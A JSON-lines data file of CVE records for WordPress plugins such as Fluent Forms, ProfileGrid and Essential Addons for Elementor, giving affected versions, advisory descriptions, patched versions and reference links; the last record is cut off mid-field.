{"CVE_ID":"CVE-2024-13666","slug":"fluentform","versionImpact":"5.2.12","versionEndExcluding":"6.0.0","description":"The Fluent Forms \u2013 Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 5.2.12 due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers spoof their IP address and submit forms that may have IP-based restrictions.","recommendation":"Update to version 6.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3258647%40fluentform%2Ftrunk&old=3242624%40fluentform%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3258647%40fluentform%2Ftrunk&old=3242624%40fluentform%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e06fe8e4-e27a-4492-b175-3b0846e4cf10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e06fe8e4-e27a-4492-b175-3b0846e4cf10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13610","slug":"simple-social-buttons","versionImpact":"5.4.0","versionEndExcluding":"6.0.0","description":"The Simple Social Media Share Buttons  WordPress plugin before 6.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85229528-1110-4d45-b972-8bbcba003a1f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85229528-1110-4d45-b972-8bbcba003a1f\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85229528-1110-4d45-b972-8bbcba003a1f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85229528-1110-4d45-b972-8bbcba003a1f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47599","slug":"file-manager","versionImpact":"5.2.7","versionEndExcluding":"6.0","description":"Deserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager \u2013 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager.This issue affects File Manager \u2013 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n\/a through 5.2.7.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/file-manager\\\/wordpress-bit-file-manager-100-free-file-manager-for-wordpress-plugin-5-2-7-php-object-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/file-manager\\\/wordpress-bit-file-manager-100-free-file-manager-for-wordpress-plugin-5-2-7-php-object-injection?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2470","slug":"sf-booking","versionImpact":"5.1","versionEndExcluding":"6.0","description":"The Service Finder Bookings plugin for WordPress, used by the Service Finder - Directory and Job Board WordPress Theme, is vulnerable to privilege escalation in all versions up to, and including, 5.1. This is due to a lack of restriction on user role in the 'nsl_registration_store_extra_input' function. This makes it possible for unauthenticated attackers to register an account on the site with an arbitrary role, including Administrator, when registering via a social login. The Nextend Social Login plugin must be installed and configured to exploit the vulnerability.","recommendation":"Update to version 6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1f62cda-262b-46d9-a839-0a573813cfa1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1f62cda-262b-46d9-a839-0a573813cfa1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11379","slug":"threewp-broadcast","versionImpact":"51.01","versionEndExcluding":"51.02","description":"The Broadcast plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'do_check' parameter in all versions up to, and including, 51.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects multi-site installations.","recommendation":"Update to version 51.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threewp-broadcast\\\/trunk\\\/src\\\/maintenance\\\/controller.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threewp-broadcast\\\/trunk\\\/src\\\/maintenance\\\/controller.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200309\\\/threewp-broadcast\\\/trunk\\\/src\\\/maintenance\\\/controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200309\\\/threewp-broadcast\\\/trunk\\\/src\\\/maintenance\\\/controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9bf506f-17b1-4ec3-87ce-1ed78db6fb0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9bf506f-17b1-4ec3-87ce-1ed78db6fb0b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25213","slug":"advanced-access-manager","versionEndExcluding":"5.9.9","description":"The Advanced Access Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Read in versions up to, and including, 5.9.8.1 due to insufficient validation on the aam-media parameter. This allows unauthenticated attackers to read any file on the server, including sensitive files such as wp-config.php","recommendation":"Update to version 5.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55e0f0df-7be2-4e18-988c-2cc558768eff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55e0f0df-7be2-4e18-988c-2cc558768eff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2098838\\\/advanced-access-manager\\\/trunk\\\/application\\\/Core\\\/Media.php?old=2151316&old_path=advanced-access-manager%2Ftrunk%2Fapplication%2FCore%2FMedia.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2098838\\\/advanced-access-manager\\\/trunk\\\/application\\\/Core\\\/Media.php?old=2151316&old_path=advanced-access-manager%2Ftrunk%2Fapplication%2FCore%2FMedia.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0954","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.7","versionEndExcluding":"5.9.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting through editing context via the 'data-eael-wrapper-link' wrapper in all versions up to, and including, 5.9.7 due to insufficient input sanitization and output escaping on user supplied protocols. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029928\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.8\\\/assets\\\/front-end\\\/js\\\/view\\\/wrapper-link.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029928\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.8\\\/assets\\\/front-end\\\/js\\\/view\\\/wrapper-link.js\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24659","slug":"wpdm-premium-packages","versionImpact":"5.9.6","versionEndExcluding":"5.9.7","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WordPress Download Manager Premium Packages allows Blind SQL Injection. This issue affects Premium Packages: from n\/a through 5.9.6.","recommendation":"Update to version 5.9.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpdm-premium-packages\\\/vulnerability\\\/wordpress-premium-packages-sell-digital-products-securely-plugin-5-9-6-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpdm-premium-packages\\\/vulnerability\\\/wordpress-premium-packages-sell-digital-products-securely-plugin-5-9-6-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6977","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.5.4","versionEndExcluding":"5.9.5.5","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018pm_get_messenger_notification\u2019 function in all versions up to, and including, 5.9.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a logged-in user into performing an action such as clicking on a link.","recommendation":"Update to version 5.9.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1322\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1329\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1329\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1330\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3324676\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3324676\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/addf264e-e23c-4bb6-a898-0fbb4ec28189?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/addf264e-e23c-4bb6-a898-0fbb4ec28189?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-4704","slug":"contact-form-7","versionImpact":"5.9.4","versionEndExcluding":"5.9.5","description":"The Contact Form 7 WordPress plugin before 5.9.5 has an open redirect that allows an attacker to utilize a false URL and redirect to the URL of their choosing.","recommendation":"Update to version 5.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8bdcdb5a-9026-4157-8592-345df8fb1a17\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8bdcdb5a-9026-4157-8592-345df8fb1a17\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0586","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.4","versionEndExcluding":"5.9.5","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Login\/Register Element in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the custom login URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022852\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.5\\\/includes\\\/Elements\\\/Login_Register.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022852\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.5\\\/includes\\\/Elements\\\/Login_Register.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0585","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.4","versionEndExcluding":"5.9.5","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the Image URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022852\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.5\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022852\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.5\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1376","slug":"event-post","versionImpact":"5.9.4","versionEndExcluding":"5.9.5","description":"The Event post plugin for WordPress is vulnerable to unauthorized bulk metadata update due to a missing capability check on the save_bulkdatas function in all versions up to, and including, 5.9.4. This makes it possible for authenticated attackers, with subscriber access or higher, to update post_meta_data.","recommendation":"Update to version 5.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926c09d5-3824-4745-99f6-50d9c945d252?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926c09d5-3824-4745-99f6-50d9c945d252?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086840\\\/event-post\\\/trunk\\\/eventpost.php?old=3060317&old_path=event-post%2Ftrunk%2Feventpost.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086840\\\/event-post\\\/trunk\\\/eventpost.php?old=3060317&old_path=event-post%2Ftrunk%2Feventpost.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0723","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.4.7","versionEndExcluding":"5.9.4.8","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to blind and time-based SQL Injections via the rid and search parameters in all versions up to, and including, 5.9.4.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.9.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-chat-system.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-chat-system.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-request.php#L2379\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-request.php#L2379\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140fa6e8-4381-4df2-af62-44d40b116daf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140fa6e8-4381-4df2-af62-44d40b116daf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0724","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.4.5","versionEndExcluding":"5.9.4.6","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.9.4.5 via deserialization of untrusted input in the get_user_meta_fields_html function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 5.9.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-html-generator.php#L259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-html-generator.php#L259\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bb1de69-7bc2-4785-9789-0a2d1cf35b9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bb1de69-7bc2-4785-9789-0a2d1cf35b9b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1408","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.4.4","versionEndExcluding":"5.9.4.5","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pm_decline_join_group_request and pm_approve_join_group_request functions in all versions up to, and including, 5.9.4.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to approve or decline join group requests which is normally should be available to administrators only.","recommendation":"Update to version 5.9.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.3\\\/public\\\/class-profile-magic-public.php#L3262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.3\\\/public\\\/class-profile-magic-public.php#L3262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.3\\\/public\\\/class-profile-magic-public.php#L3306\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.3\\\/public\\\/class-profile-magic-public.php#L3306\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/641f7727-83ba-45c2-b3e1-1ce19f86eac7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/641f7727-83ba-45c2-b3e1-1ce19f86eac7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13740","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.4.2","versionEndExcluding":"5.9.4.3","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.9.4.2 via the pm_messenger_show_messages function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read private conversations of other users.","recommendation":"Update to version 5.9.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/class-profile-magic-public.php#L1299\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/class-profile-magic-public.php#L1299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2a1b1a4-df72-4666-b116-882af4cd5796?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2a1b1a4-df72-4666-b116-882af4cd5796?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13741","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.4.2","versionEndExcluding":"5.9.4.3","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to Limited Server-Side Request Forgery in all versions up to, and including, 5.9.4.2 via the pm_upload_image function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to download and view images, as well as validating if a non-image file exists, both on local or remote hosts.","recommendation":"Update to version 5.9.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/class-profile-magic-public.php#L1717\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/class-profile-magic-public.php#L1717\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/partials\\\/crop.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/partials\\\/crop.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95d2a05d-67ae-45b1-8add-0dcf73d43181?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95d2a05d-67ae-45b1-8add-0dcf73d43181?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10900","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.3.6","versionEndExcluding":"5.9.3.7","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pm_remove_file_attachment() function in all versions up to, and including, 5.9.3.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary user meta which can do things like deny an administrator's access to their site. .","recommendation":"Update to version 5.9.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0e5fcfa-ebc9-45f6-9cbc-c9e3540baa6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0e5fcfa-ebc9-45f6-9cbc-c9e3540baa6f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L1902\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L1902\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190069%40profilegrid-user-profiles-groups-and-communities&new=3190069%40profilegrid-user-profiles-groups-and-communities&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190069%40profilegrid-user-profiles-groups-and-communities&new=3190069%40profilegrid-user-profiles-groups-and-communities&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6526","slug":"meta-box","versionImpact":"5.9.2","versionEndExcluding":"5.9.3","description":"The Meta Box \u2013 WordPress Custom Fields Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom post meta values displayed through the plugin's shortcode in all versions up to, and including, 5.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a6bfc87-6135-4d49-baa2-e8e6291148dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a6bfc87-6135-4d49-baa2-e8e6291148dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030376%40meta-box&new=3030376%40meta-box&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030376%40meta-box&new=3030376%40meta-box&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5189","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.23","versionEndExcluding":"5.9.24","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018custom_js\u2019 parameter in all versions up to, and including, 5.9.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.24, or a newer patched 